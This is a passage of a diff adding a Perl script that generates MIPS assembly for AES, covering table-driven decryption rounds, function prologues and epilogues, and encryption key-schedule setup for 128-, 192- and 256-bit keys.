+	.cplocal	$Tbl
+	.cpsetup	$pf,$zero,AES_encrypt
+___
+$code.=<<___;
+	.set	reorder
+	la	$Tbl,AES_Te		# PIC-ified 'load address'
+
+	lwl	$s0,0+$MSB($inp)
+	lwl	$s1,4+$MSB($inp)
+	lwl	$s2,8+$MSB($inp)
+	lwl	$s3,12+$MSB($inp)
+	lwr	$s0,0+$LSB($inp)
+	lwr	$s1,4+$LSB($inp)
+	lwr	$s2,8+$LSB($inp)
+	lwr	$s3,12+$LSB($inp)
+
+	bal	_mips_AES_encrypt
+
+	swr	$s0,0+$LSB($out)
+	swr	$s1,4+$LSB($out)
+	swr	$s2,8+$LSB($out)
+	swr	$s3,12+$LSB($out)
+	swl	$s0,0+$MSB($out)
+	swl	$s1,4+$MSB($out)
+	swl	$s2,8+$MSB($out)
+	swl	$s3,12+$MSB($out)
+
+	.set	noreorder
+	$REG_L	$ra,$FRAMESIZE-1*$SZREG($sp)
+	$REG_L	$fp,$FRAMESIZE-2*$SZREG($sp)
+	$REG_L	$s11,$FRAMESIZE-3*$SZREG($sp)
+	$REG_L	$s10,$FRAMESIZE-4*$SZREG($sp)
+	$REG_L	$s9,$FRAMESIZE-5*$SZREG($sp)
+	$REG_L	$s8,$FRAMESIZE-6*$SZREG($sp)
+	$REG_L	$s7,$FRAMESIZE-7*$SZREG($sp)
+	$REG_L	$s6,$FRAMESIZE-8*$SZREG($sp)
+	$REG_L	$s5,$FRAMESIZE-9*$SZREG($sp)
+	$REG_L	$s4,$FRAMESIZE-10*$SZREG($sp)
+___
+$code.=<<___ if ($flavour =~ /nubi/i);
+	$REG_L	\$15,$FRAMESIZE-11*$SZREG($sp)
+	$REG_L	\$14,$FRAMESIZE-12*$SZREG($sp)
+	$REG_L	\$13,$FRAMESIZE-13*$SZREG($sp)
+	$REG_L	\$12,$FRAMESIZE-14*$SZREG($sp)
+	$REG_L	$gp,$FRAMESIZE-15*$SZREG($sp)
+___
+$code.=<<___;
+	jr	$ra
+	$PTR_ADD $sp,$FRAMESIZE
+.end	AES_encrypt
+___
+
+$code.=<<___;
+.align	5
+.ent	_mips_AES_decrypt
+_mips_AES_decrypt:
+	.frame	$sp,0,$ra
+	.set	reorder
+	lw	$t0,0($key)
+	lw	$t1,4($key)
+	lw	$t2,8($key)
+	lw	$t3,12($key)
+	lw	$cnt,240($key)
+	$PTR_ADD $key0,$key,16
+
+	xor	$s0,$t0
+	xor	$s1,$t1
+	xor	$s2,$t2
+	xor	$s3,$t3
+
+	sub	$cnt,1
+#if defined(__mips_smartmips)
+	ext	$i0,$s3,16,8
+.Loop_dec:
+	ext	$i1,$s0,16,8
+	ext	$i2,$s1,16,8
+	ext	$i3,$s2,16,8
+	lwxs	$t0,$i0($Tbl)		# Td1[s3>>16]
+	ext	$i0,$s2,8,8
+	lwxs	$t1,$i1($Tbl)		# Td1[s0>>16]
+	ext	$i1,$s3,8,8
+	lwxs	$t2,$i2($Tbl)		# Td1[s1>>16]
+	ext	$i2,$s0,8,8
+	lwxs	$t3,$i3($Tbl)		# Td1[s2>>16]
+	ext	$i3,$s1,8,8
+
+	lwxs	$t4,$i0($Tbl)		# Td2[s2>>8]
+	ext	$i0,$s1,0,8
+	lwxs	$t5,$i1($Tbl)		# Td2[s3>>8]
+	ext	$i1,$s2,0,8
+	lwxs	$t6,$i2($Tbl)		# Td2[s0>>8]
+	ext	$i2,$s3,0,8
+	lwxs	$t7,$i3($Tbl)		# Td2[s1>>8]
+	ext	$i3,$s0,0,8
+
+	lwxs	$t8,$i0($Tbl)		# Td3[s1]
+	ext	$i0,$s0,24,8
+	lwxs	$t9,$i1($Tbl)		# Td3[s2]
+	ext	$i1,$s1,24,8
+	lwxs	$t10,$i2($Tbl)		# Td3[s3]
+	ext	$i2,$s2,24,8
+	lwxs	$t11,$i3($Tbl)		# Td3[s0]
+	ext	$i3,$s3,24,8
+
+	rotr	$t0,$t0,8
+	rotr	$t1,$t1,8
+	rotr	$t2,$t2,8
+	rotr	$t3,$t3,8
+
+	rotr	$t4,$t4,16
+	rotr	$t5,$t5,16
+	rotr	$t6,$t6,16
+	rotr	$t7,$t7,16
+
+	xor	$t0,$t4
+	lwxs	$t4,$i0($Tbl)		# Td0[s0>>24]
+	xor	$t1,$t5
+	lwxs	$t5,$i1($Tbl)		# Td0[s1>>24]
+	xor	$t2,$t6
+	lwxs	$t6,$i2($Tbl)		# Td0[s2>>24]
+	xor	$t3,$t7
+	lwxs	$t7,$i3($Tbl)		# Td0[s3>>24]
+
+	rotr	$t8,$t8,24
+	lw	$s0,0($key0)
+	rotr	$t9,$t9,24
+	lw	$s1,4($key0)
+	rotr	$t10,$t10,24
+	lw	$s2,8($key0)
+	rotr	$t11,$t11,24
+	lw	$s3,12($key0)
+
+	xor	$t0,$t8
+	xor	$t1,$t9
+	xor	$t2,$t10
+	xor	$t3,$t11
+
+	xor	$t0,$t4
+	xor	$t1,$t5
+	xor	$t2,$t6
+	xor	$t3,$t7
+
+	sub	$cnt,1
+	$PTR_ADD $key0,16
+	xor	$s0,$t0
+	xor	$s1,$t1
+	xor	$s2,$t2
+	xor	$s3,$t3
+	.set	noreorder
+	bnez	$cnt,.Loop_dec
+	ext	$i0,$s3,16,8
+
+	_xtr	$i0,$s3,16-2
+#else
+	_xtr	$i0,$s3,16-2
+.Loop_dec:
+	_xtr	$i1,$s0,16-2
+	_xtr	$i2,$s1,16-2
+	_xtr	$i3,$s2,16-2
+	and	$i0,0x3fc
+	and	$i1,0x3fc
+	and	$i2,0x3fc
+	and	$i3,0x3fc
+	$PTR_ADD $i0,$Tbl
+	$PTR_ADD $i1,$Tbl
+	$PTR_ADD $i2,$Tbl
+	$PTR_ADD $i3,$Tbl
+#if defined(_MIPS_ARCH_MIPS32R2) || defined(_MIPS_ARCH_MIPS64R2)
+	lw	$t0,0($i0)		# Td1[s3>>16]
+	_xtr	$i0,$s2,8-2
+	lw	$t1,0($i1)		# Td1[s0>>16]
+	_xtr	$i1,$s3,8-2
+	lw	$t2,0($i2)		# Td1[s1>>16]
+	_xtr	$i2,$s0,8-2
+	lw	$t3,0($i3)		# Td1[s2>>16]
+	_xtr	$i3,$s1,8-2
+#else
+	lwl	$t0,3($i0)		# Td1[s3>>16]
+	lwl	$t1,3($i1)		# Td1[s0>>16]
+	lwl	$t2,3($i2)		# Td1[s1>>16]
+	lwl	$t3,3($i3)		# Td1[s2>>16]
+	lwr	$t0,2($i0)		# Td1[s3>>16]
+	_xtr	$i0,$s2,8-2
+	lwr	$t1,2($i1)		# Td1[s0>>16]
+	_xtr	$i1,$s3,8-2
+	lwr	$t2,2($i2)		# Td1[s1>>16]
+	_xtr	$i2,$s0,8-2
+	lwr	$t3,2($i3)		# Td1[s2>>16]
+	_xtr	$i3,$s1,8-2
+#endif
+
+	and	$i0,0x3fc
+	and	$i1,0x3fc
+	and	$i2,0x3fc
+	and	$i3,0x3fc
+	$PTR_ADD $i0,$Tbl
+	$PTR_ADD $i1,$Tbl
+	$PTR_ADD $i2,$Tbl
+	$PTR_ADD $i3,$Tbl
+#if defined(_MIPS_ARCH_MIPS32R2) || defined(_MIPS_ARCH_MIPS64R2)
+	rotr	$t0,$t0,8
+	rotr	$t1,$t1,8
+	rotr	$t2,$t2,8
+	rotr	$t3,$t3,8
+# if defined(_MIPSEL)
+	lw	$t4,0($i0)		# Td2[s2>>8]
+	_xtr	$i0,$s1,0-2
+	lw	$t5,0($i1)		# Td2[s3>>8]
+	_xtr	$i1,$s2,0-2
+	lw	$t6,0($i2)		# Td2[s0>>8]
+	_xtr	$i2,$s3,0-2
+	lw	$t7,0($i3)		# Td2[s1>>8]
+	_xtr	$i3,$s0,0-2
+
+	and	$i0,0x3fc
+	and	$i1,0x3fc
+	and	$i2,0x3fc
+	and	$i3,0x3fc
+	$PTR_ADD $i0,$Tbl
+	$PTR_ADD $i1,$Tbl
+	$PTR_ADD $i2,$Tbl
+	$PTR_ADD $i3,$Tbl
+	lw	$t8,0($i0)		# Td3[s1]
+	$PTR_INS $i0,$s0,2,8
+	lw	$t9,0($i1)		# Td3[s2]
+	$PTR_INS $i1,$s1,2,8
+	lw	$t10,0($i2)		# Td3[s3]
+	$PTR_INS $i2,$s2,2,8
+	lw	$t11,0($i3)		# Td3[s0]
+	$PTR_INS $i3,$s3,2,8
+#else
+	lw	$t4,0($i0)		# Td2[s2>>8]
+	$PTR_INS $i0,$s1,2,8
+	lw	$t5,0($i1)		# Td2[s3>>8]
+	$PTR_INS $i1,$s2,2,8
+	lw	$t6,0($i2)		# Td2[s0>>8]
+	$PTR_INS $i2,$s3,2,8
+	lw	$t7,0($i3)		# Td2[s1>>8]
+	$PTR_INS $i3,$s0,2,8
+
+	lw	$t8,0($i0)		# Td3[s1]
+	_xtr	$i0,$s0,24-2
+	lw	$t9,0($i1)		# Td3[s2]
+	_xtr	$i1,$s1,24-2
+	lw	$t10,0($i2)		# Td3[s3]
+	_xtr	$i2,$s2,24-2
+	lw	$t11,0($i3)		# Td3[s0]
+	_xtr	$i3,$s3,24-2
+
+	and	$i0,0x3fc
+	and	$i1,0x3fc
+	and	$i2,0x3fc
+	and	$i3,0x3fc
+	$PTR_ADD $i0,$Tbl
+	$PTR_ADD $i1,$Tbl
+	$PTR_ADD $i2,$Tbl
+	$PTR_ADD $i3,$Tbl
+#endif
+	rotr	$t4,$t4,16
+	rotr	$t5,$t5,16
+	rotr	$t6,$t6,16
+	rotr	$t7,$t7,16
+
+	rotr	$t8,$t8,24
+	rotr	$t9,$t9,24
+	rotr	$t10,$t10,24
+	rotr	$t11,$t11,24
+#else
+	lwl	$t4,2($i0)		# Td2[s2>>8]
+	lwl	$t5,2($i1)		# Td2[s3>>8]
+	lwl	$t6,2($i2)		# Td2[s0>>8]
+	lwl	$t7,2($i3)		# Td2[s1>>8]
+	lwr	$t4,1($i0)		# Td2[s2>>8]
+	_xtr	$i0,$s1,0-2
+	lwr	$t5,1($i1)		# Td2[s3>>8]
+	_xtr	$i1,$s2,0-2
+	lwr	$t6,1($i2)		# Td2[s0>>8]
+	_xtr	$i2,$s3,0-2
+	lwr	$t7,1($i3)		# Td2[s1>>8]
+	_xtr	$i3,$s0,0-2
+
+	and	$i0,0x3fc
+	and	$i1,0x3fc
+	and	$i2,0x3fc
+	and	$i3,0x3fc
+	$PTR_ADD $i0,$Tbl
+	$PTR_ADD $i1,$Tbl
+	$PTR_ADD $i2,$Tbl
+	$PTR_ADD $i3,$Tbl
+	lwl	$t8,1($i0)		# Td3[s1]
+	lwl	$t9,1($i1)		# Td3[s2]
+	lwl	$t10,1($i2)		# Td3[s3]
+	lwl	$t11,1($i3)		# Td3[s0]
+	lwr	$t8,0($i0)		# Td3[s1]
+	_xtr	$i0,$s0,24-2
+	lwr	$t9,0($i1)		# Td3[s2]
+	_xtr	$i1,$s1,24-2
+	lwr	$t10,0($i2)		# Td3[s3]
+	_xtr	$i2,$s2,24-2
+	lwr	$t11,0($i3)		# Td3[s0]
+	_xtr	$i3,$s3,24-2
+
+	and	$i0,0x3fc
+	and	$i1,0x3fc
+	and	$i2,0x3fc
+	and	$i3,0x3fc
+	$PTR_ADD $i0,$Tbl
+	$PTR_ADD $i1,$Tbl
+	$PTR_ADD $i2,$Tbl
+	$PTR_ADD $i3,$Tbl
+#endif
+
+	xor	$t0,$t4
+	lw	$t4,0($i0)		# Td0[s0>>24]
+	xor	$t1,$t5
+	lw	$t5,0($i1)		# Td0[s1>>24]
+	xor	$t2,$t6
+	lw	$t6,0($i2)		# Td0[s2>>24]
+	xor	$t3,$t7
+	lw	$t7,0($i3)		# Td0[s3>>24]
+
+	xor	$t0,$t8
+	lw	$s0,0($key0)
+	xor	$t1,$t9
+	lw	$s1,4($key0)
+	xor	$t2,$t10
+	lw	$s2,8($key0)
+	xor	$t3,$t11
+	lw	$s3,12($key0)
+
+	xor	$t0,$t4
+	xor	$t1,$t5
+	xor	$t2,$t6
+	xor	$t3,$t7
+
+	sub	$cnt,1
+	$PTR_ADD $key0,16
+	xor	$s0,$t0
+	xor	$s1,$t1
+	xor	$s2,$t2
+	xor	$s3,$t3
+	.set	noreorder
+	bnez	$cnt,.Loop_dec
+	_xtr	$i0,$s3,16-2
+#endif
+
+	.set	reorder
+	lw	$t4,1024($Tbl)		# prefetch Td4
+	_xtr	$i0,$s3,16
+	lw	$t5,1024+32($Tbl)
+	_xtr	$i1,$s0,16
+	lw	$t6,1024+64($Tbl)
+	_xtr	$i2,$s1,16
+	lw	$t7,1024+96($Tbl)
+	_xtr	$i3,$s2,16
+	lw	$t8,1024+128($Tbl)
+	and	$i0,0xff
+	lw	$t9,1024+160($Tbl)
+	and	$i1,0xff
+	lw	$t10,1024+192($Tbl)
+	and	$i2,0xff
+	lw	$t11,1024+224($Tbl)
+	and	$i3,0xff
+
+	$PTR_ADD $i0,$Tbl
+	$PTR_ADD $i1,$Tbl
+	$PTR_ADD $i2,$Tbl
+	$PTR_ADD $i3,$Tbl
+	lbu	$t0,1024($i0)		# Td4[s3>>16]
+	_xtr	$i0,$s2,8
+	lbu	$t1,1024($i1)		# Td4[s0>>16]
+	_xtr	$i1,$s3,8
+	lbu	$t2,1024($i2)		# Td4[s1>>16]
+	_xtr	$i2,$s0,8
+	lbu	$t3,1024($i3)		# Td4[s2>>16]
+	_xtr	$i3,$s1,8
+
+	and	$i0,0xff
+	and	$i1,0xff
+	and	$i2,0xff
+	and	$i3,0xff
+	$PTR_ADD $i0,$Tbl
+	$PTR_ADD $i1,$Tbl
+	$PTR_ADD $i2,$Tbl
+	$PTR_ADD $i3,$Tbl
+#if defined(_MIPS_ARCH_MIPS32R2) || defined(_MIPS_ARCH_MIPS64R2)
+# if defined(_MIPSEL)
+	lbu	$t4,1024($i0)		# Td4[s2>>8]
+	$PTR_INS $i0,$s0,0,8
+	lbu	$t5,1024($i1)		# Td4[s3>>8]
+	$PTR_INS $i1,$s1,0,8
+	lbu	$t6,1024($i2)		# Td4[s0>>8]
+	$PTR_INS $i2,$s2,0,8
+	lbu	$t7,1024($i3)		# Td4[s1>>8]
+	$PTR_INS $i3,$s3,0,8
+
+	lbu	$t8,1024($i0)		# Td4[s0>>24]
+	_xtr	$i0,$s1,0
+	lbu	$t9,1024($i1)		# Td4[s1>>24]
+	_xtr	$i1,$s2,0
+	lbu	$t10,1024($i2)		# Td4[s2>>24]
+	_xtr	$i2,$s3,0
+	lbu	$t11,1024($i3)		# Td4[s3>>24]
+	_xtr	$i3,$s0,0
+
+	$PTR_ADD $i0,$Tbl
+	$PTR_ADD $i1,$Tbl
+	$PTR_ADD $i2,$Tbl
+	$PTR_ADD $i3,$Tbl
+# else
+	lbu	$t4,1024($i0)		# Td4[s2>>8]
+	_xtr	$i0,$s0,24
+	lbu	$t5,1024($i1)		# Td4[s3>>8]
+	_xtr	$i1,$s1,24
+	lbu	$t6,1024($i2)		# Td4[s0>>8]
+	_xtr	$i2,$s2,24
+	lbu	$t7,1024($i3)		# Td4[s1>>8]
+	_xtr	$i3,$s3,24
+
+	$PTR_ADD $i0,$Tbl
+	$PTR_ADD $i1,$Tbl
+	$PTR_ADD $i2,$Tbl
+	$PTR_ADD $i3,$Tbl
+	lbu	$t8,1024($i0)		# Td4[s0>>24]
+	$PTR_INS $i0,$s1,0,8
+	lbu	$t9,1024($i1)		# Td4[s1>>24]
+	$PTR_INS $i1,$s2,0,8
+	lbu	$t10,1024($i2)		# Td4[s2>>24]
+	$PTR_INS $i2,$s3,0,8
+	lbu	$t11,1024($i3)		# Td4[s3>>24]
+	$PTR_INS $i3,$s0,0,8
+# endif
+	_ins	$t0,16
+	_ins	$t1,16
+	_ins	$t2,16
+	_ins	$t3,16
+
+	_ins2	$t0,$t4,8
+	lbu	$t4,1024($i0)		# Td4[s1]
+	_ins2	$t1,$t5,8
+	lbu	$t5,1024($i1)		# Td4[s2]
+	_ins2	$t2,$t6,8
+	lbu	$t6,1024($i2)		# Td4[s3]
+	_ins2	$t3,$t7,8
+	lbu	$t7,1024($i3)		# Td4[s0]
+
+	_ins2	$t0,$t8,24
+	lw	$s0,0($key0)
+	_ins2	$t1,$t9,24
+	lw	$s1,4($key0)
+	_ins2	$t2,$t10,24
+	lw	$s2,8($key0)
+	_ins2	$t3,$t11,24
+	lw	$s3,12($key0)
+
+	_ins2	$t0,$t4,0
+	_ins2	$t1,$t5,0
+	_ins2	$t2,$t6,0
+	_ins2	$t3,$t7,0
+#else
+	lbu	$t4,1024($i0)		# Td4[s2>>8]
+	_xtr	$i0,$s0,24
+	lbu	$t5,1024($i1)		# Td4[s3>>8]
+	_xtr	$i1,$s1,24
+	lbu	$t6,1024($i2)		# Td4[s0>>8]
+	_xtr	$i2,$s2,24
+	lbu	$t7,1024($i3)		# Td4[s1>>8]
+	_xtr	$i3,$s3,24
+
+	$PTR_ADD $i0,$Tbl
+	$PTR_ADD $i1,$Tbl
+	$PTR_ADD $i2,$Tbl
+	$PTR_ADD $i3,$Tbl
+	lbu	$t8,1024($i0)		# Td4[s0>>24]
+	_xtr	$i0,$s1,0
+	lbu	$t9,1024($i1)		# Td4[s1>>24]
+	_xtr	$i1,$s2,0
+	lbu	$t10,1024($i2)		# Td4[s2>>24]
+	_xtr	$i2,$s3,0
+	lbu	$t11,1024($i3)		# Td4[s3>>24]
+	_xtr	$i3,$s0,0
+
+	$PTR_ADD $i0,$Tbl
+	$PTR_ADD $i1,$Tbl
+	$PTR_ADD $i2,$Tbl
+	$PTR_ADD $i3,$Tbl
+
+	_ins	$t0,16
+	_ins	$t1,16
+	_ins	$t2,16
+	_ins	$t3,16
+
+	_ins	$t4,8
+	_ins	$t5,8
+	_ins	$t6,8
+	_ins	$t7,8
+
+	xor	$t0,$t4
+	lbu	$t4,1024($i0)		# Td4[s1]
+	xor	$t1,$t5
+	lbu	$t5,1024($i1)		# Td4[s2]
+	xor	$t2,$t6
+	lbu	$t6,1024($i2)		# Td4[s3]
+	xor	$t3,$t7
+	lbu	$t7,1024($i3)		# Td4[s0]
+
+	_ins	$t8,24
+	lw	$s0,0($key0)
+	_ins	$t9,24
+	lw	$s1,4($key0)
+	_ins	$t10,24
+	lw	$s2,8($key0)
+	_ins	$t11,24
+	lw	$s3,12($key0)
+
+	xor	$t0,$t8
+	xor	$t1,$t9
+	xor	$t2,$t10
+	xor	$t3,$t11
+
+	_ins	$t4,0
+	_ins	$t5,0
+	_ins	$t6,0
+	_ins	$t7,0
+
+	xor	$t0,$t4
+	xor	$t1,$t5
+	xor	$t2,$t6
+	xor	$t3,$t7
+#endif
+
+	xor	$s0,$t0
+	xor	$s1,$t1
+	xor	$s2,$t2
+	xor	$s3,$t3
+
+	jr	$ra
+.end	_mips_AES_decrypt
+
+.align	5
+.globl	AES_decrypt
+.ent	AES_decrypt
+AES_decrypt:
+	.frame	$sp,$FRAMESIZE,$ra
+	.mask	$SAVED_REGS_MASK,-$SZREG
+	.set	noreorder
+___
+$code.=<<___ if ($flavour =~ /o32/i);	# o32 PIC-ification
+	.cpload	$pf
+___
+$code.=<<___;
+	$PTR_SUB $sp,$FRAMESIZE
+	$REG_S	$ra,$FRAMESIZE-1*$SZREG($sp)
+	$REG_S	$fp,$FRAMESIZE-2*$SZREG($sp)
+	$REG_S	$s11,$FRAMESIZE-3*$SZREG($sp)
+	$REG_S	$s10,$FRAMESIZE-4*$SZREG($sp)
+	$REG_S	$s9,$FRAMESIZE-5*$SZREG($sp)
+	$REG_S	$s8,$FRAMESIZE-6*$SZREG($sp)
+	$REG_S	$s7,$FRAMESIZE-7*$SZREG($sp)
+	$REG_S	$s6,$FRAMESIZE-8*$SZREG($sp)
+	$REG_S	$s5,$FRAMESIZE-9*$SZREG($sp)
+	$REG_S	$s4,$FRAMESIZE-10*$SZREG($sp)
+___
+$code.=<<___ if ($flavour =~ /nubi/i);	# optimize non-nubi prologue
+	$REG_S	\$15,$FRAMESIZE-11*$SZREG($sp)
+	$REG_S	\$14,$FRAMESIZE-12*$SZREG($sp)
+	$REG_S	\$13,$FRAMESIZE-13*$SZREG($sp)
+	$REG_S	\$12,$FRAMESIZE-14*$SZREG($sp)
+	$REG_S	$gp,$FRAMESIZE-15*$SZREG($sp)
+___
+$code.=<<___ if ($flavour !~ /o32/i);	# non-o32 PIC-ification
+	.cplocal	$Tbl
+	.cpsetup	$pf,$zero,AES_decrypt
+___
+$code.=<<___;
+	.set	reorder
+	la	$Tbl,AES_Td		# PIC-ified 'load address'
+
+	lwl	$s0,0+$MSB($inp)
+	lwl	$s1,4+$MSB($inp)
+	lwl	$s2,8+$MSB($inp)
+	lwl	$s3,12+$MSB($inp)
+	lwr	$s0,0+$LSB($inp)
+	lwr	$s1,4+$LSB($inp)
+	lwr	$s2,8+$LSB($inp)
+	lwr	$s3,12+$LSB($inp)
+
+	bal	_mips_AES_decrypt
+
+	swr	$s0,0+$LSB($out)
+	swr	$s1,4+$LSB($out)
+	swr	$s2,8+$LSB($out)
+	swr	$s3,12+$LSB($out)
+	swl	$s0,0+$MSB($out)
+	swl	$s1,4+$MSB($out)
+	swl	$s2,8+$MSB($out)
+	swl	$s3,12+$MSB($out)
+
+	.set	noreorder
+	$REG_L	$ra,$FRAMESIZE-1*$SZREG($sp)
+	$REG_L	$fp,$FRAMESIZE-2*$SZREG($sp)
+	$REG_L	$s11,$FRAMESIZE-3*$SZREG($sp)
+	$REG_L	$s10,$FRAMESIZE-4*$SZREG($sp)
+	$REG_L	$s9,$FRAMESIZE-5*$SZREG($sp)
+	$REG_L	$s8,$FRAMESIZE-6*$SZREG($sp)
+	$REG_L	$s7,$FRAMESIZE-7*$SZREG($sp)
+	$REG_L	$s6,$FRAMESIZE-8*$SZREG($sp)
+	$REG_L	$s5,$FRAMESIZE-9*$SZREG($sp)
+	$REG_L	$s4,$FRAMESIZE-10*$SZREG($sp)
+___
+$code.=<<___ if ($flavour =~ /nubi/i);
+	$REG_L	\$15,$FRAMESIZE-11*$SZREG($sp)
+	$REG_L	\$14,$FRAMESIZE-12*$SZREG($sp)
+	$REG_L	\$13,$FRAMESIZE-13*$SZREG($sp)
+	$REG_L	\$12,$FRAMESIZE-14*$SZREG($sp)
+	$REG_L	$gp,$FRAMESIZE-15*$SZREG($sp)
+___
+$code.=<<___;
+	jr	$ra
+	$PTR_ADD $sp,$FRAMESIZE
+.end	AES_decrypt
+___
+}}}
+
+{{{
+my $FRAMESIZE=8*$SZREG;
+my $SAVED_REGS_MASK = ($flavour =~ /nubi/i) ? 0xc000f008 : 0xc0000000;
+
+my ($inp,$bits,$key,$Tbl)=($a0,$a1,$a2,$a3);
+my ($rk0,$rk1,$rk2,$rk3,$rk4,$rk5,$rk6,$rk7)=($a4,$a5,$a6,$a7,$s0,$s1,$s2,$s3);
+my ($i0,$i1,$i2,$i3)=($at,$t0,$t1,$t2);
+my ($rcon,$cnt)=($gp,$fp);
+
+$code.=<<___;
+.align	5
+.ent	_mips_AES_set_encrypt_key
+_mips_AES_set_encrypt_key:
+	.frame	$sp,0,$ra
+	.set	noreorder
+	beqz	$inp,.Lekey_done
+	li	$t0,-1
+	beqz	$key,.Lekey_done
+	$PTR_ADD $rcon,$Tbl,256
+
+	.set	reorder
+	lwl	$rk0,0+$MSB($inp)	# load 128 bits
+	lwl	$rk1,4+$MSB($inp)
+	lwl	$rk2,8+$MSB($inp)
+	lwl	$rk3,12+$MSB($inp)
+	li	$at,128
+	lwr	$rk0,0+$LSB($inp)
+	lwr	$rk1,4+$LSB($inp)
+	lwr	$rk2,8+$LSB($inp)
+	lwr	$rk3,12+$LSB($inp)
+	.set	noreorder
+	beq	$bits,$at,.L128bits
+	li	$cnt,10
+
+	.set	reorder
+	lwl	$rk4,16+$MSB($inp)	# load 192 bits
+	lwl	$rk5,20+$MSB($inp)
+	li	$at,192
+	lwr	$rk4,16+$LSB($inp)
+	lwr	$rk5,20+$LSB($inp)
+	.set	noreorder
+	beq	$bits,$at,.L192bits
+	li	$cnt,8
+
+	.set	reorder
+	lwl	$rk6,24+$MSB($inp)	# load 256 bits
+	lwl	$rk7,28+$MSB($inp)
+	li	$at,256
+	lwr	$rk6,24+$LSB($inp)
+	lwr	$rk7,28+$LSB($inp)
+	.set	noreorder
+	beq	$bits,$at,.L256bits
+	li	$cnt,7
+
+	b	.Lekey_done
+	li	$t0,-2
+
+.align	4
+.L128bits:
+	.set	reorder
+	srl	$i0,$rk3,16
+	srl	$i1,$rk3,8
+	and	$i0,0xff
+	and	$i1,0xff
+	and	$i2,$rk3,0xff
+	srl	$i3,$rk3,24
+	$PTR_ADD $i0,$Tbl
+	$PTR_ADD $i1,$Tbl
+	$PTR_ADD $i2,$Tbl
+	$PTR_ADD $i3,$Tbl
+	lbu	$i0,0($i0)
+	lbu	$i1,0($i1)
+	lbu	$i2,0($i2)
+	lbu	$i3,0($i3)
+
+	sw	$rk0,0($key)
+	sw	$rk1,4($key)
+	sw	$rk2,8($key)
+	sw	$rk3,12($key)
+	sub	$cnt,1
+	$PTR_ADD $key,16
+
+	_bias	$i0,24
+	_bias	$i1,16
+	_bias	$i2,8
+	_bias	$i3,0
+
+	xor	$rk0,$i0
+	lw	$i0,0($rcon)
+	xor	$rk0,$i1
+	xor	$rk0,$i2
+	xor	$rk0,$i3
+	xor	$rk0,$i0
+
+	xor	$rk1,$rk0
+	xor	$rk2,$rk1
+	xor	$rk3,$rk2
+
+	.set	noreorder
+	bnez	$cnt,.L128bits
+	$PTR_ADD $rcon,4
+
+	sw	$rk0,0($key)
+	sw	$rk1,4($key)
+	sw	$rk2,8($key)
+	li	$cnt,10
+	sw	$rk3,12($key)
+	li	$t0,0
+	sw	$cnt,80($key)
+	b	.Lekey_done
+	$PTR_SUB $key,10*16
+
+.align	4
+.L192bits:
+	.set	reorder
+	srl	$i0,$rk5,16
+	srl	$i1,$rk5,8
+	and	$i0,0xff
+	and	$i1,0xff
+	and	$i2,$rk5,0xff
+	srl	$i3,$rk5,24
+	$PTR_ADD $i0,$Tbl
+	$PTR_ADD $i1,$Tbl
+	$PTR_ADD $i2,$Tbl
+	$PTR_ADD $i3,$Tbl
+	lbu	$i0,0($i0)
+	lbu	$i1,0($i1)
+	lbu	$i2,0($i2)
+	lbu	$i3,0($i3)
+
+	sw	$rk0,0($key)
+	sw	$rk1,4($key)
+	sw	$rk2,8($key)
+	sw	$rk3,12($key)
+	sw	$rk4,16($key)
+	sw	$rk5,20($key)
+	sub	$cnt,1
+	$PTR_ADD $key,24
+
+	_bias	$i0,24
+	_bias	$i1,16
+	_bias	$i2,8
+	_bias	$i3,0
+
+	xor	$rk0,$i0
+	lw	$i0,0($rcon)
+	xor	$rk0,$i1
+	xor	$rk0,$i2
+	xor	$rk0,$i3
+	xor	$rk0,$i0
+
+	xor	$rk1,$rk0
+	xor	$rk2,$rk1
+	xor	$rk3,$rk2
+	xor	$rk4,$rk3
+	xor	$rk5,$rk4
+
+	.set	noreorder
+	bnez	$cnt,.L192bits
+	$PTR_ADD $rcon,4
+
+	sw	$rk0,0($key)
+	sw	$rk1,4($key)
+	sw	$rk2,8($key)
+	li	$cnt,12
+	sw	$rk3,12($key)
+	li	$t0,0
+	sw	$cnt,48($key)
+	b	.Lekey_done
+	$PTR_SUB $key,12*16
+
+.align	4
+.L256bits:
+	.set	reorder
+	srl	$i0,$rk7,16
+	srl	$i1,$rk7,8
+	and	$i0,0xff
+	and	$i1,0xff
+	and	$i2,$rk7,0xff
+	srl	$i3,$rk7,24
+	$PTR_ADD $i0,$Tbl
+	$PTR_ADD $i1,$Tbl
+	$PTR_ADD $i2,$Tbl
+	$PTR_ADD $i3,$Tbl
+	lbu	$i0,0($i0)
+	lbu	$i1,0($i1)
+	lbu	$i2,0($i2)
+	lbu	$i3,0($i3)
+
+	sw	$rk0,0($key)
+	sw	$rk1,4($key)
+	sw	$rk2,8($key)
+	sw	$rk3,12($key)
+	sw	$rk4,16($key)
+	sw	$rk5,20($key)
+	sw	$rk6,24($key)
+	sw	$rk7,28($key)
+	sub	$cnt,1
+
+	_bias	$i0,24
+	_bias	$i1,16
+	_bias	$i2,8
+	_bias	$i3,0
+
+	xor	$rk0,$i0
+	lw	$i0,0($rcon)
+	xor	$rk0,$i1
+	xor	$rk0,$i2
+	xor	$rk0,$i3
+	xor	$rk0,$i0
+
+	xor	$rk1,$rk0
+	xor	$rk2,$rk1
+	xor	$rk3,$rk2
+	beqz	$cnt,.L256bits_done
+
+	srl	$i0,$rk3,24
+	srl	$i1,$rk3,16
+	srl	$i2,$rk3,8
+	and	$i3,$rk3,0xff
+	and	$i1,0xff
+	and	$i2,0xff
+	$PTR_ADD $i0,$Tbl
+	$PTR_ADD $i1,$Tbl
+	$PTR_ADD $i2,$Tbl
+	$PTR_ADD $i3,$Tbl
+	lbu	$i0,0($i0)
+	lbu	$i1,0($i1)
+	lbu	$i2,0($i2)
+	lbu	$i3,0($i3)
+	sll	$i0,24
+	sll	$i1,16
+	sll	$i2,8
+
+	xor	$rk4,$i0
+	xor	$rk4,$i1
+	xor	$rk4,$i2
+	xor	$rk4,$i3
+
+	xor	$rk5,$rk4
+	xor	$rk6,$rk5
+	xor	$rk7,$rk6
+
+	$PTR_ADD $key,32
+	.set	noreorder
+	b	.L256bits
+	$PTR_ADD $rcon,4
+
+.L256bits_done:
+	sw	$rk0,32($key)
+	sw	$rk1,36($key)
+	sw	$rk2,40($key)
+	li	$cnt,14
+	sw	$rk3,44($key)
+	li	$t0,0
+	sw	$cnt,48($key)
+	$PTR_SUB $key,12*16
+
+.Lekey_done:
+	jr	$ra
+	nop
+.end	_mips_AES_set_encrypt_key
+
+.globl	private_AES_set_encrypt_key
+.ent	private_AES_set_encrypt_key
+private_AES_set_encrypt_key:
+	.frame	$sp,$FRAMESIZE,$ra
